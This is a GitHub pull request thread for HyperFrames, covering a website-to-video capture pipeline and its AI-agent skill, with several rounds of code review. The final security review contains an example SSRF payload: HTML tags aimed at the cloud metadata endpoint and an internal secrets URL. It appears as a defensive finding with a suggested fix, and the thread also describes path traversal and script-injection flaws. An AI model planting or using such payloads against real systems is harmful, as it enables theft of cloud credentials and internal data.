feat: website capture pipeline + 7-step video production skill by ularkim · Pull Request #284 · heygen-com/hyperframes

ularkim · 2026-04-15T18:13:06Z

What

Full website-to-video pipeline: npx hyperframes capture <URL> extracts a site's design system, assets, and screenshots, then the /website-to-hyperframes skill guides an AI agent through a 7-step workflow (capture → DESIGN.md → script → storyboard → VO → build → validate) to produce a professional video.

Why

There was no way to go from a URL to a video. Users had to manually screenshot sites, pick colors, find assets, and figure out the creative direction themselves. This automates the entire pipeline — a single prompt like "Create a 25-second product launch video from https://stripe.com" should produce production-quality output.

How

Capture pipeline (packages/cli/src/capture/):

Puppeteer-based extraction: design tokens (colors as HEX, fonts, headings, CTAs, sections), visible text, animations catalog, WebGL shaders, Lottie manifests
Asset downloading with DOM context enrichment (alt text, nearest heading, section classes, above-fold detection)
Scroll-position screenshots (5 viewports at 0/25/50/75/100% scroll) + per-section viewport tiles (up to 24)
Optional Gemini 2.5 Flash vision captioning for downloaded images (GEMINI_API_KEY env var)
Auto-generates a CLAUDE.md for the captured site so any agent session can pick up the project

Snapshot command (packages/cli/src/commands/snapshot.ts):

npx hyperframes snapshot <dir> --at 2.9,10.4,18.7 for visual self-verification
Bundles project HTML, serves locally, launches headless Chrome, seeks to timestamps, captures PNG frames
Used by Step 7 (validate) so the agent can visually verify its own output

7-step skill workflow (skills/website-to-hyperframes/):

Step 1: Capture & understand (write-down-and-forget method for context management)
Step 2: Write DESIGN.md (6-section brand reference, ~90 lines)
Step 3: Write SCRIPT (narration with 2.5 words/sec pacing)
Step 4: Write STORYBOARD (creative north star — concept-first, cinematic, 8-10 elements per beat)
Step 5: Generate VO + map timing (ElevenLabs TTS, word-level timestamps)
Step 6: Build compositions (static layout first, then animate, asset cross-reference)
Step 7: Validate & deliver (lint, validate, snapshot verification, HANDOFF.md)
10 visual techniques reference with copy-pasteable code patterns
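
As an illustration of the Step 3 pacing rule, here is a minimal sketch of how a narration word budget could be checked against a target duration. The helper names (`wordBudget`, `countWords`, `fitsBudget`) are hypothetical and not part of the skill; only the 2.5 words/sec figure comes from the description above.

```typescript
// Hypothetical helpers: the skill states the pacing rule, not this code.
const WORDS_PER_SECOND = 2.5;

// Maximum number of narration words for a video of the given length.
function wordBudget(durationSec: number, wordsPerSec: number = WORDS_PER_SECOND): number {
  if (!Number.isFinite(durationSec) || durationSec <= 0) return 0;
  // Round down so the narration never overruns the video.
  return Math.floor(durationSec * wordsPerSec);
}

// Whitespace-delimited word count.
function countWords(script: string): number {
  const trimmed = script.trim();
  return trimmed === "" ? 0 : trimmed.split(/\s+/).length;
}

function fitsBudget(script: string, durationSec: number): boolean {
  return countWords(script) <= wordBudget(durationSec);
}
```

Under this sketch, the 25-second example from the Why section allows at most 62 words of narration.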

GSAP lint rule (packages/core/src/lint/rules/gsap.ts):

Extended gsap_css_transform_conflict to detect inline style="transform:..." attributes
Indexes all classes on an element (not just the first) for accurate conflict detection

Notable decisions:

Storyboard-driven, not DESIGN.md-driven — DESIGN.md is a brand cheat sheet, the storyboard is the creative north star
No checklist in the skill — tested across 6 iterations; checklists killed creativity (agents spent context checking boxes instead of building interesting compositions)
Gemini captioning is optional and gracefully degrades — Promise.allSettled handles individual failures
Captions are optional (only built if user requests) to reduce overhead
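
The graceful-degradation decision can be sketched as follows. This assumes a caller-supplied `captionOne` function (hypothetical; the real Gemini call is not shown in this PR text) and illustrates how `Promise.allSettled` keeps one failed caption from aborting the rest.

```typescript
type Caption = { file: string; caption: string | null };

// captionOne is a stand-in for whatever performs the vision call.
async function captionAll(
  files: string[],
  captionOne: (file: string) => Promise<string>,
): Promise<Caption[]> {
  // allSettled never rejects: each entry reports its own success or failure.
  const results = await Promise.allSettled(files.map((f) => captionOne(f)));
  return results.map((r, i) => ({
    file: files[i] ?? "",
    // A failed caption degrades to null instead of failing the capture.
    caption: r.status === "fulfilled" ? r.value : null,
  }));
}
```

With `Promise.all`, a single rate-limit error would reject the whole batch; here the caller can fall back to DOM-context descriptions for the `null` entries.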

Test plan

Manual testing: 6 iterations across Stripe and Railway websites with full pipeline execution
CLI type-checks clean (tsc --noEmit — pre-existing errors in verify/index.ts only)
Lint + format pass (oxlint + oxfmt via lefthook pre-commit)
Code review: 16 bugs found and fixed (path traversal, browser leak, div-by-zero, dead code, wrong API config, broken skill references)
All skill file cross-references verified (transitions/catalog.md, shader-setup.md, techniques.md, etc.)
Unit tests for inline-style GSAP lint detection (identified gap, not yet written)
Documentation updated (CLAUDE.md aligned with main, AGENTS.md untouched)

🤖 Generated with Claude Code

Adds `hyperframes capture <url>` command that extracts a complete design system from any website, producing AI-agent-ready output:

- Full-page screenshot (lazy-load aware, nav at top)
- AI-generated DESIGN.md via Claude API (colors, typography, elevation, components, do's/don'ts) with programmatic asset catalog (136+ assets with HTML context annotations like img[src], css url(), link[rel=preload])
- CSS-purged compositions (87% size reduction via PurgeCSS)
- HTML-prettified compositions (one-tag-per-line for AI readability)
- CLAUDE.md + .cursorrules auto-generated for AI agent instructions
- Asset deduplication (srcset variants) and tracking pixel filtering

…ment

- switch to gemini 3.1 pro (gemini-3.1-pro-preview) with claude fallback
- playwright for full-page screenshots (fixes puppeteer gradient/fixed bugs)
- replica refinement loop: generate, screenshot, compare, fix
- extract inline svgs (50 max, 10kb each) to assets/svgs/
- extract visible text in dom order for content accuracy
- detect js libraries (gsap, three.js, scrolltrigger) via globals
- improved asset catalog grouping and naming
- reverse-engineered aura system prompt documentation
- comprehensive session handoff doc

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

- key finding: team already wants DESIGN.md integration (James, Bin, Vance) - skills quality matters enormously - must invoke /hyperframes-compose - eval infrastructure exists (Abhay's dashboards, Teodora's 78-criteria guide) - templates at templates/ need study before finalizing skill - session handoff updated with critical next steps

Captures Lottie animations via network interception and WebGL shader source via gl.shaderSource hooking during site crawl. Updates website-to-hyperframes skill with asset planning guidance, Lottie/shader reading instructions, and stronger creative direction for scene planning. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

Capture pipeline:

- Remove dead deps (puppeteer-extra, stealth plugin, duplicate devDeps)
- Remove duplicate generateAgentPrompt() call (first lied about DESIGN.md)
- Remove dead canvas-to-image code in htmlExtractor (post canvas removal)
- Parallelize image downloads (batches of 5 via Promise.allSettled)
- Fix pre-existing TS error (match[1] guard in font downloader)
- Default capture output to captures/<hostname>

Skill creative overhaul:

- Add shader transition selection to creative director step (Step 4)
- Add shader wiring instructions to engineer step (Step 5)
- Replace 4-line energy modifiers with visual vocabulary table
- Strip rigid scene-by-scene templates from video-recipes.md
- Strip example fill data from scene plan tables
- Add "read transition refs before planning" instruction
- Add creative ambition language ("how the hell did they make this")

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

Comprehensive redesign of website-to-hyperframes skill and capture pipeline based on code review findings and Claude Code architecture research. Key changes: remove AI auto-generation, restructure skill into phases, embed shader boilerplate in scaffold, fix color format. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

13-task plan covering: capture pipeline cleanup (remove AI generation, fix colors to HEX, add asset descriptions, shader-ready scaffold), skill restructuring (4 phases with artifact gates), and compose skill Visual Identity Gate upgrade. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

… descriptions

…trator

- Remove orphaned `false` argument in generateAgentPrompt call (critical: was shifting hasLottie, hasShaders, catalogedAssets parameters)
- Add HSL color handling in rgbToHex via temp element resolution
- Remove build artifact commit section from phase-4-build.md
- Fix __GSAP_TIMELINE reference to __timelines

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

…criptions

- Double-escape regex in tokenExtractor template literal (\s→\\s, \d→\\d, \(→\\() so browser receives valid regex patterns via page.evaluate()
- Simplify index.html scaffold: scene slots + audio + timeline + comment pointing to shader-setup.md reference (no broken inline shader boilerplate)
- Fix asset descriptions: use CatalogedAsset.contexts/notes instead of nonexistent htmlContext field

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

Code fixes:

- snapshot.ts: path traversal guard, browser leak (try/finally), div-by-zero for --frames 1, port bind error handling, rAF-based render settle
- index.ts: remove invalid thinkingConfig for gemini-2.5-flash, fix Gemini batch/rate-limit comments, fix video preview viewport y-coordinate
- tokenExtractor.ts: remove dead seen[si] dedup code
- gsap.ts: index ALL classes for inline-style transform conflict detection

Skill architecture rewrite (4-phase → 7-step):

- Replace phase-1 through phase-4 with step-1 through step-7
- Add techniques.md (10 visual techniques with code patterns)
- Fix /hyperframes-compose → /hyperframes (skill doesn't exist)
- Fix captures/arc-browser reference → shader-setup.md (file doesn't exist)
- Fix step-7 hardcoded captures/stripe path
- Document Gemini API free/paid rate limits in step-1

Cleanup:

- CLAUDE.md: restore from Stripe-capture overwrite, update 4-phase → 7-step
- .gitignore: add PR #267 skills (hyperframes-animation-map, hyperframes-contrast)
- Delete old phase-*.md, animation-recreation.md, tts-integration.md

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

Remove files that shouldn't ship in this PR:

- docs/research/ (aura analysis, prompt catalogs)
- docs/session-*.md, docs/SESSION-HANDOFF.md (dev notes)
- docs/superpowers/ planning and spec docs
- pnpm-lock.yaml at root and cli (repo uses bun, not pnpm)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

…ames mention

Main PR #283 removed the full skills table from CLAUDE.md and moved it to AGENTS.md. Align with that decision: use main's slim dev-focused format, fix pnpm→bun references, add one-line /website-to-hyperframes pointer.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

The capture command was registered in cli.ts but missing from the help groups, so it wouldn't appear in `hyperframes --help`. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

The lockfile was stale after rebasing onto main — bun install --frozen-lockfile failed in CI because new dependencies (google/genai, patchright, purgecss) weren't reflected in the lockfile. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

vanceingalls · 2026-04-15T20:33:19Z

+>
+  $1.9T
+</div>
+


Contradicts step-6-build.md rule. This code example uses left:50%;transform:translateX(-50%) for centering — the exact pattern that step-6-build.md:133 explicitly forbids:

Never use ANY CSS transform for centering — not translate(-50%, -50%), not translateX(-50%). GSAP animates the transform property, which overwrites ALL CSS transforms including centering. The element flies offscreen.

The linter also catches this (gsap_css_transform_conflict), and the new inline-style detection in this same PR would flag it. Fix to flexbox centering:

<div style="position:absolute;top:280px;left:0;width:100%;display:flex;justify-content:center;">
  <div id="hero-stat" style="font-size:200px;font-weight:900;color:#fff;opacity:0;">
    $1.9T
  </div>
</div>

Same fix needed for the #label element a few lines below.

vanceingalls · 2026-04-15T20:33:34Z

+        if (root) return parseFloat(root.getAttribute("data-duration") ?? "0");
+        const tls = win.__timelines;
+        if (tls) {
+          for (const key in tls) {


Same duration function bug. This is the same pattern flagged in the other inline review — win.__player.duration may be a GSAP method reference (truthy but not a number), which propagates to the seek positions as NaN. Same fix:

const d = win.__player?.duration;
if (d != null) return typeof d === "function" ? d() : d;
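
A slightly more defensive variant of this fix, as a sketch only: `PlayerLike` and `readDuration` are hypothetical names, and the shape of `win.__player` is assumed from the comment above. It invokes the method through the player object, since a detached method reference generally loses its `this` binding, and it never returns NaN.

```typescript
// Assumed shape: duration is either a number or a zero-argument method.
type PlayerLike = { duration?: number | (() => number) };

function readDuration(player: PlayerLike | undefined): number {
  if (!player) return 0;
  const d = player.duration;
  // Invoke with the player as `this` so prototype methods keep working.
  const value = typeof d === "function" ? d.call(player) : d;
  // Fall back to 0 rather than letting NaN reach the seek positions.
  return typeof value === "number" && Number.isFinite(value) ? value : 0;
}
```

Returning 0 for a missing or non-numeric duration lets the caller fall through to the `data-duration` and `__timelines` lookups shown in the diff context.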

vanceingalls · 2026-04-15T20:33:44Z

+      res.end();
+      return;
+    }
+    if (existsSync(filePath)) {


POSIX-only path traversal guard — third instance. Same pattern flagged on capture/index.ts and verify/index.ts. projectDir + "/" breaks on Windows where the separator is \. All three should share a single helper:

import { relative, isAbsolute } from "node:path";

function isInsideDir(base: string, target: string): boolean {
  const rel = relative(base, target);
  return !rel.startsWith("..") && !isAbsolute(rel);
}
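
To show why the separator matters, the sketch below runs the same guard against Node's `path.posix` and `path.win32` implementations explicitly, so the Windows behaviour can be checked from any host OS. Passing the path API as a parameter and the `naiveGuard` comparison function are illustrative assumptions, not code from this PR.

```typescript
import { posix, win32 } from "node:path";

type PathApi = typeof posix;

// Same logic as the suggested helper, parameterized by platform path API.
function isInsideDir(p: PathApi, base: string, target: string): boolean {
  const rel = p.relative(base, target);
  return !rel.startsWith("..") && !p.isAbsolute(rel);
}

// The POSIX-only pattern being replaced: a string prefix check with "/".
function naiveGuard(base: string, target: string): boolean {
  return target.startsWith(base + "/");
}

// Windows path inside the project: accepted by relative(), rejected by the naive check.
const insideWin = isInsideDir(win32, "C:\\proj", "C:\\proj\\index.html");
const naiveWin = naiveGuard("C:\\proj", "C:\\proj\\index.html");

// Traversal and sibling-prefix attempts are rejected on both platforms.
const escapedPosix = isInsideDir(posix, "/srv/proj", "/srv/proj/../secret");
const siblingPosix = isInsideDir(posix, "/srv/proj", "/srv/proj-secrets/x");
const otherDrive = isInsideDir(win32, "C:\\proj", "D:\\other\\x.txt");
```

One caveat of the `startsWith("..")` test: a legitimate file whose name begins with two dots (for example `..notes`) would also be rejected, which errs on the safe side.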

vanceingalls · 2026-04-15T20:34:07Z

+notion-ai-agents/
+stripe-launch/
+stripe-investor/
+stripe-website/


20 hardcoded test capture directories. These are the author's local test artifacts — notion-promo/, stripe-launch/, arc-browser/, lusion-brand/, etc. They'll grow with every test run and don't belong in the repo's gitignore. Replace with a generic pattern:

# Capture outputs
captures/
*-capture/

Or add them to .git/info/exclude if they're local-only.

vanceingalls · 2026-04-15T20:34:15Z

+    "purgecss": "^8.0.0"
+  },
  "devDependencies": {
    "@commitlint/cli": "^20.5.0",


Root production dependencies that only the CLI uses. patchright and purgecss are added here but only packages/cli uses them. purgecss is already in packages/cli/package.json. Move patchright to the CLI package and remove both from root — this avoids bloating bun install for anyone working on core, engine, player, etc.

vanceingalls · 2026-04-15T20:34:24Z

Hard dependency for optional Gemini captioning. The PR description says "Gemini captioning is optional and gracefully degrades" with Promise.allSettled. But @google/genai is a non-optional dependency here — it gets installed for every user even if they never set GEMINI_API_KEY. Dynamically import with try/catch instead, or move to optionalDependencies.
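
A minimal sketch of the dynamic-import approach, assuming a generic `loadOptional` helper (a hypothetical name, not from the PR). It returns `null` when the package is not installed so the caller can skip the optional feature.

```typescript
// Hypothetical helper: resolves to the module, or null if it cannot be loaded.
async function loadOptional<T = unknown>(specifier: string): Promise<T | null> {
  try {
    return (await import(specifier)) as T;
  } catch {
    // Not installed (or failed to initialize): treat the feature as unavailable.
    return null;
  }
}
```

The captioning step could then call `loadOptional("@google/genai")` and skip captioning when the result is `null` or `GEMINI_API_KEY` is unset, instead of failing at import time.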

vanceingalls · 2026-04-15T20:34:33Z

    "postcss": "^8.5.8",
-    "puppeteer-core": "^24.39.1"
+    "prettier": "^3.8.1",
+    "puppeteer-core": "^24.39.1",


CLI now depends on both puppeteer-core AND playwright. screenshotCapture.ts uses Playwright for captureFullPageScreenshot while everything else uses Puppeteer. That's ~200MB+ of extra browser binaries for one function. Either migrate the full-page screenshot to Puppeteer's page.screenshot({ fullPage: true }) (which already works), or move everything to Playwright. Having both is costly for install size and maintenance.

vanceingalls · 2026-04-15T20:34:51Z

+- **Kokoro** (offline last resort — has Python dependency issues on many systems) — `npx hyperframes tts SCRIPT.md --voice af_nova --output narration.wav`. Only try this if ElevenLabs and HeyGen are unavailable.
+
+Pick the voice that sounds most natural and conversational. Listen for pacing — does it breathe between sentences? Does it sound like a person or a robot?
+


TTS ranking contradicts CLAUDE.md and the hyperframes skill. ElevenLabs is listed as "recommended" here, with Kokoro relegated to "offline last resort — has Python dependency issues." But the project's CLAUDE.md documents Kokoro-82M as the primary TTS tool (npx hyperframes tts), and references/tts.md in the hyperframes skill is entirely Kokoro-focused.

An agent following this skill will skip the built-in tool in favor of an external API that requires auth setup. The ranking should either:

Put Kokoro first (it's built-in, no API key, no auth)

Or explicitly state when to prefer ElevenLabs over Kokoro (e.g., "when voice quality matters more than setup speed")

Also: the note says HeyGen TTS "returns word timestamps automatically" — that's exactly what downstream steps need for beat mapping. If timing is the priority, HeyGen should rank above ElevenLabs, not below it.

Review fixes (16 comments from jrusso1020 + vanceingalls):

- screenshotCapture: remove Playwright dep, use Puppeteer for all screenshots
- screenshotCapture: dynamic screenshot count based on page height (30% overlap)
- snapshot.ts: fix duration() function-vs-property bug, cross-platform path guard
- htmlExtractor: fix code injection via parameterized evaluate
- index.ts: video preview re-measures position after scroll, .env file loading
- capture.ts: BLOCKED.md on timeout failures
- gsap.ts: 5 inline-style lint tests added (all pass)
- Remove Playwright, patchright deps; @google/genai to optionalDependencies
- Gitignore: generic patterns instead of 20 hardcoded directories
- Remove asset-sourcing.md, video-recipes.md (unused, duplicated guidance)

Capture quality improvements (tested on 10+ websites):

- Color extraction: canvas-based oklch/lab resolver, pixel sampling via elementFromPoint, broad sweep for accent colors, gradient/shadow extraction
- Section detection: broadened selectors for div-based layouts, height cap to skip page-level wrappers, parent bg walkup for dark sites
- Font downloads: cap 6 per family / 30 total (Cal.com: 306→30)
- CTA detection: text pattern matching + nav context filtering
- Heading text: innerText with whitespace normalization
- Gemini captioning: maxOutputTokens 100→300, .env auto-loading
- .env.example updated with GEMINI_API_KEY docs
- TTS ranking: Kokoro first with Python 3.10+ note

ularkim · 2026-04-16T01:25:26Z

Review Response

Addressed all 16 comments in commit 6266708. Here's the summary:

Fixed ✅

| # | Issue | Fix |
|---|---|---|
| 1 | Playwright browser leak | Removed Playwright entirely; all screenshots now use Puppeteer |
| 2 | Video preview stale coords | Re-measures position after scroll via `getBoundingClientRect()`, seeks to 0.1s for decoder |
| 3/10 | `duration` function bug | `typeof d === "function" ? d() : d` check |
| 4/11 | Path traversal Windows | `path.relative` + `isAbsolute` check |
| 5 | No inline-style lint tests | 5 tests added (translate, scale, rotate no-FP, multi-class, dual style+inline) |
| 7 | Duplicated guidance | Removed `video-recipes.md` and `asset-sourcing.md` (sources of duplication) |
| 8 | Code injection htmlExtractor | Parameterized `page.evaluate(fn, href)` instead of string interpolation |
| 9 | video-recipes contradiction | File removed (the translateX centering example is gone) |
| 12 | 20 hardcoded gitignore entries | Replaced with generic patterns (`-capture/`, `-demo/`, etc.) |
| 13 | Root deps | Removed `patchright` (dead dep, never imported), `purgecss` already in CLI |
| 14 | `@google/genai` hard dep | Moved to `optionalDependencies` |
| 15 | Puppeteer + Playwright | Removed Playwright entirely; screenshots use Puppeteer with dynamic viewport tiling |
| 16 | TTS ranking | Kokoro first (free, built-in) with Python 3.10+ requirement noted and ElevenLabs/HeyGen as fallbacks |

Deferred to follow-up PR

| # | Issue | Reason |
|---|---|---|
| 6 | Split index.ts (1126 lines) | Significant refactor risk in same PR as 15+ other changes. Will do as immediate follow-up. |

Additional improvements in this commit

Color extraction: canvas-based oklch/lab resolver, pixel sampling via elementFromPoint, gradient/shadow color extraction
Section detection: broadened selectors, height cap for page wrappers, parent bg walkup
Font downloads: capped at 6/family, 30 total (Cal.com: 306→30)
CTA detection: text pattern matching + nav context filtering
Screenshots: dynamic count based on page height (30% overlap), removed section tiling
Gemini captioning: .env auto-loading, maxOutputTokens 100→300
BLOCKED.md: written on timeout/anti-bot failures
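
The dynamic screenshot count can be sketched as below. This is an illustration under stated assumptions, not the code in screenshotCapture.ts: the function name and parameters are hypothetical, the 30% overlap comes from the summary above, and the default cap of 20 mirrors the limit mentioned later in review.

```typescript
// Returns the scrollY offsets at which to capture viewport-sized screenshots.
function scrollOffsets(
  pageHeight: number,
  viewportHeight: number,
  overlap = 0.3,
  maxShots = 20,
): number[] {
  if (pageHeight <= 0 || viewportHeight <= 0) return [];
  const cap = Math.max(1, maxShots);
  // Furthest the page can scroll; 0 when the page fits in one viewport.
  const maxScroll = Math.max(0, pageHeight - viewportHeight);
  // Each shot advances by the non-overlapping part of the viewport.
  const step = Math.max(1, Math.round(viewportHeight * (1 - overlap)));
  const offsets: number[] = [];
  for (let y = 0; y < maxScroll && offsets.length < cap - 1; y += step) {
    offsets.push(y);
  }
  // Always finish with the bottom of the page.
  offsets.push(maxScroll);
  return offsets;
}
```

For a 3000px page and a 1000px viewport this yields offsets 0, 700, 1400, and 2000, so consecutive frames share 300px and the last frame is flush with the page bottom.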

Tested on 10+ websites: Linear, Cal.com, Tailwind CSS, Supabase, Basecamp, Dribbble, Notion, Resend, Midjourney, Dub.co, Shopify, Vercel.

vanceingalls

All 16 review items from both passes have been addressed in 6266708. Nice work.

One fix needed before merge — CI is red:

verify/index.ts:132,137 — noUncheckedIndexedAccess: true means sections[i] is SectionResult | undefined. Add a guard:

const section = sections[i];
if (!section) continue;

Minor (not blocking): verify/index.ts file server (~line 95) has no path traversal guard — same join(projectDir, url) pattern that was fixed in snapshot.ts. Low risk (localhost, random port, short-lived) but worth matching the fix pattern from snapshot.ts:

const rel = relative(projectDir, filePath);
if (rel.startsWith('..') || isAbsolute(rel)) { res.writeHead(403); res.end(); return; }

Everything else looks solid — parameterized evaluate, Playwright removal, optional Gemini dep, TTS ranking, lint tests, gitignore patterns all check out.

jrusso1020

Staff-Engineer Second Pass Review

The fix commit (6266708) addressed the majority of the first-round feedback well — credit to @ularkim for taking it seriously. Browser leak, code injection, duration bug, path traversal in snapshot.ts, GSAP lint tests, Playwright removal, TTS ranking, and the video-recipes.md duplication source are all resolved. Solid work.

That said, a few items remain open from the first round, and the fix commit introduced one new regression.

Still Open — Must Fix Before Merge

1. verify/index.ts — path traversal (security)
The file server has no path traversal guard. req.url is decoded and join()-ed to projectDir without checking whether the result escapes the directory. This was fixed in snapshot.ts but NOT here — same bug, same pattern. Needs the same relative() + isAbsolute() guard that snapshot.ts now has. Lift it into a shared helper since it's needed in two places.

2. capture/index.ts — still 1,175 lines
The modularity concern was acknowledged but not addressed. The file orchestrates browser launch, WebGL hooks, Lottie interception, animation cataloging, HTML extraction, token extraction, video manifest, text extraction, Gemini captioning, asset descriptions, section splitting, CSS purging, and project scaffolding — in one function. The ═══ comment banners are literally the module boundaries waiting to become files. This is the single biggest maintainability risk in the PR and will make the next bug in this pipeline painful to isolate.

3. package.json — adm-zip removed but still dynamically imported (regression)
The fix commit removed adm-zip from dependencies, but index.ts still dynamically imports it for .lottie file extraction (const AdmZip = (await import("adm-zip")).default). This will crash at runtime when a captured site has Lottie animations packaged as .lottie files. Either restore the dependency or remove the dead code path.

Should Fix

4. Lottie JSON injection in index.ts
Raw Lottie JSON file content (animJson) is interpolated directly into a <script> tag template literal: animationData:${animJson}. A malicious Lottie file could break out of the JS expression. Low blast radius (headless Chrome, short-lived), but still a code injection vector. Use JSON.stringify() to safely embed it.
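
One caveat worth illustrating: `JSON.stringify()` alone does not escape `<`, so a string value containing `</script>` would still terminate the script element. A minimal sketch of a safer embed follows, assuming a hypothetical `embedJsonInScript` helper; it validates the raw text as JSON and escapes `<` as `\u003c`.

```typescript
// Hypothetical helper: returns text safe to place inside an inline <script>.
function embedJsonInScript(rawJson: string): string {
  // Throws on anything that is not valid JSON (e.g. arbitrary JS expressions).
  const parsed: unknown = JSON.parse(rawJson);
  // "<" only occurs inside JSON strings, where \u003c is an equivalent escape.
  return JSON.stringify(parsed).replace(/</g, "\\u003c");
}
```

The escaped output parses back to the same data, but the HTML parser no longer sees a closing tag inside the script body. Passing the data through a parameterized `page.evaluate()` avoids the string embedding altogether.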

5. Step-4 contradiction on technique count
step-4-storyboard.md says "Pick 2-3 per beat" (so 16-24 technique uses for an 8-beat video) but the global guardrails in the same file say "Use at least 2-3 different techniques across the video" (only 2-3 total). For an 8-beat video these differ by a factor of 8. The per-beat guidance matches the surrounding context, so tighten the global guardrail phrasing to match.

6. .env.example removed ANTHROPIC_API_KEY
The old file had ANTHROPIC_API_KEY for "AI-assisted composition via MCP." This PR replaces it with GEMINI_API_KEY. If MCP composition is still a feature (and it is), new contributors won't discover it. Keep both keys listed.

7. Step-6 asset presentation recommends transform: perspective(...) as static CSS
This directly conflicts with the "GSAP overwrites ALL CSS transforms" rule in the same file's Critical Rules section. If an agent applies this tilt AND then animates with GSAP, the tilt vanishes. Should recommend gsap.set() instead for elements that will be animated.

8. step-1-capture.md leads with Gemini API key
The capture works fully without any API key — DOM-context descriptions (alt text, nearest heading, section classes, above-fold) are the zero-config default, and @google/genai is correctly in optionalDependencies. But the skill doc's first paragraph leads with the Gemini key, which can give agents (or users) the impression it's required. Suggest reordering to lead with the zero-config path:

npx hyperframes capture <URL> -o captures/<project-name>
No API keys required. The capture extracts design tokens, screenshots, fonts, and assets with DOM-context descriptions automatically.

Optional: Set GEMINI_API_KEY for richer AI-powered image descriptions via Gemini 2.5 Flash vision.

Nits

~15 silent catch {} blocks in index.ts swallow errors without pushing to warnings[] — users won't know why a capture is incomplete
snapshot.ts CLI help uses hardcoded captures/stripe — captures/<project> would be more consistent with skill docs
visual-style.md vs visual-styles.md disambiguation exists but is buried in a parenthetical — could be a standalone callout

Verdict

Three items remain blocking: the verify/index.ts path traversal (#1, security), adm-zip runtime crash (#3, regression from the fix commit), and index.ts modularity (#2, maintainability). The first two are quick fixes; #2 is the real question — gate merge or track as immediate follow-up.

Everything else from the first round was resolved well. The overall feature design is strong.

Review round 2 fixes (jrusso1020 + vanceingalls):

- verify/index.ts: add path traversal guard (relative + isAbsolute)
- verify/index.ts: fix sections[i] undefined typecheck error (CI green)
- index.ts: escape Lottie JSON with \u003c to prevent </script> breakout
- step-4-storyboard: fix technique count contradiction (2-3 per beat, not across whole video)
- step-6-build: perspective tilt uses gsap.set() instead of CSS transform (avoids GSAP overwrite conflict)
- step-1-capture: reorder so the command comes first and the Gemini note after (zero-config is the default path, API key is optional enhancement)
- step-7-validate: add tsx fallback for snapshot command
- step-3-script: vary hook patterns, don't default to number every time
- assetDownloader: exempt SVGs from 10KB minimum filter (company logos like Hubspot/Intel/DHL are 2-6KB; HeyGen capture: 13→75 assets)

Note: adm-zip was NOT removed (reviewer #3); it's still in packages/cli/package.json:30. The root package.json had patchright and purgecss removed, not adm-zip.

Note: ANTHROPIC_API_KEY not restored in .env.example; grep confirms zero references in the entire codebase. The @anthropic-ai/sdk dependency was removed earlier in this branch.

miguel-heygen

Third-pass review — focused on issues not covered by James's or Vance's reviews. All their feedback still stands. The latest commit (6266708) correctly addresses all previously flagged items (verified each fix).

Must fix before merge

SSRF via unrestricted fetch() in asset downloads and CSS fetching — fetchBuffer() and the stylesheet fetch in htmlExtractor.ts follow any URL from the target page, including cloud metadata endpoints (169.254.169.254), internal services, and localhost. Inline on assetDownloader.ts.
JS injection via Lottie JSON interpolated into setContent — raw fetched JSON is template-literal'd directly into a <script> block. A crafted Lottie file can break out of the JS context. Inline on index.ts.
verify/index.ts file server has no path traversal guard — the fix applied to snapshot.ts was not applied here. Inline.

Should fix

Unbounded response body in Lottie interception — response.buffer() downloads the full body before size-checking. Inline on index.ts.
adm-zip used at runtime but missing from dependencies — index.ts dynamically imports adm-zip to extract dotLottie ZIP files. The try/catch prevents crashes, but dotLottie extraction silently fails. Should be in optionalDependencies (like @google/genai) or a regular dep.
Manual .env parsing is fragile — hand-rolled parser doesn't handle edge cases and modifies process.env as a side effect. Inline on index.ts.

Smaller items (not blocking)

Lottie dedup uses jsonData.slice(0, 200) as a "hash" — files with identical headers get falsely deduped
maxScreenshots param accepted but unused (underscore-prefixed); cap hardcoded at 20 in screenshotCapture.ts
prettier (14MB+) is a regular dep but only used optionally in cssPurger.ts — should be optionalDependencies
Duplicate slugify() in assetDownloader.ts and compositionGen.ts
CDP session from animationCataloger.ts is disabled but never detached
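
For the Lottie dedup item, one possible replacement for the 200-character prefix is a digest of the full content. The sketch below uses `createHash` from `node:crypto`; `contentKey` and `dedupeByContent` are hypothetical names, not functions from the PR.

```typescript
import { createHash } from "node:crypto";

// Key derived from the entire payload, not just its first 200 characters.
function contentKey(jsonData: string): string {
  return createHash("sha256").update(jsonData).digest("hex");
}

// Keeps the first occurrence of each distinct payload, preserving order.
function dedupeByContent(files: string[]): string[] {
  const seen = new Set<string>();
  const unique: string[] = [];
  for (const data of files) {
    const key = contentKey(data);
    if (seen.has(key)) continue;
    seen.add(key);
    unique.push(data);
  }
  return unique;
}
```

Two animations that share an identical header but differ later in the file now get different keys, while byte-identical downloads still collapse to one entry.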

Verification of fixes from commit `6266708`

All 7 previously flagged items verified as correctly fixed:

htmlExtractor.ts injection: parameterized page.evaluate
screenshotCapture.ts: Playwright removed, Puppeteer only
snapshot.ts duration(): typeof d === "function" check
snapshot.ts path traversal: relative() + isAbsolute()
GSAP lint tests: 5 new tests added
.gitignore: generic patterns
@google/genai: optionalDependencies

miguel-heygen · 2026-04-16T02:50:57Z

+  try {
+    const res = await fetch(url, {
+      signal: AbortSignal.timeout(10000),
+      headers: { "User-Agent": "HyperFrames/1.0" },


SSRF via unrestricted fetch(). fetchBuffer() follows any URL passed to it — including cloud metadata endpoints, internal services, and localhost. Since the capture pipeline navigates to arbitrary user-provided URLs and then fetches derived URLs (stylesheets, images, Lotties) server-side, a malicious site can embed:

<link rel="stylesheet" href="http://169.254.169.254/latest/meta-data/">
<img src="http://internal-service:8080/admin/secrets">

...and this function will fetch them and save the response to disk.

Fix: Add URL validation before fetching. At minimum reject private IP ranges (10.x, 172.16-31.x, 192.168.x, 127.x, 169.254.x), non-HTTP(S) schemes, and localhost. Apply the same check in the CSS fetch in htmlExtractor.ts and the Lottie download in index.ts.
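
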